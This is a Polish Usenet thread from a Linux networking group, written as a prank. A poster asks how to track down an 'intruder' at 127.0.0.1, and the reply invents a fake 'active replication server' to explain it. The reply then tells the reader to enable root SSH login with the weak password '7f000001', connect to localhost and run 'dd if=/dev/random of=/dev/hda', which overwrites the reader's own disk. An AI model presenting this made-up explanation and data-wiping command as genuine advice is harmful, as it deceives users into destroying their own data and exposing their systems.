Włamanie

In pl.comp.os.linux.sieci FastViper wrote:

> Włamanie naszczęście nie do mnie, ale do kolegi.
> > Taki problem: Zobaczył w logach, że ktoś z adresu 127.0.0.1 wysyłał maile
> przez jego kompa. To jest dosyć dziwne, bo on ma zamknięty relay....
> Zniknęły mu też pliki z dysku.. Poprosił mnie o pomoc, to ja go namierzam: > ping 127.0.0.1
> Blisko jest sukinkot! (<1ms). Próbowałem się logować (telnetem i ssh) na ten
> serwer ale odrzuca. Ftp ani www nie ma też...
>
> Chcę mu zrobić krzywdę... Pomocy. Jak go zlokalizować? (Sprawdźcie pingi do
> niego od siebie i wyślijcie raporty tutaj..) Może wspólnymi siłami go
> pokonamy...
>
> Co mam odpowiedzieć koledze?


127.0.0.1 to bardzo zlosliwy serwer aktywnej replikacji. Stara sie upodobnic do kompa, na ktorego usiluje sie (automatycznie) wlamac. W ten sposob moze oszukiwac uzytkownikow laczacych sie z zewnatrz - wydaje im sie, ze lacza sie z Twoim kompem, a w rzeczywistosci sa polaczeni z 127.0.0.1. W ten sposob wlamywacz moze uslyszec wszystkie hasla z przychodzacych polaczen.

Mozna go zalatwic jego wlasna bronia. Wlacz na kompie kumpla dostep przez ssh (sshd). Zmien haslo root'a chwilowo na '7f000001' (bez cudzyslowow - to szesnastkowo 127.0.0.1). Wowczas na 127.0.0.1 (na zasadzie aktywnej replikacji) rowniez pojawi sie dostep przez ssh - i to z takim samym haslem

Laczysz sie do 127.0.0.1 przez ssh jako root, haslo 7f000001 i wpisujesz np.
dd if=/dev/random of=/dev/hda

To uziemi parszywe 127.0.0.1 na dluzszy czas. Trzeba sie spieszyc, bo wlamywacz moze Ciebie porzucic i zabrac sie za kolejna ofiare - wowczas nie bedziesz juz mial do niego takiego dostepu.

Powodzenia!

A.Slodowy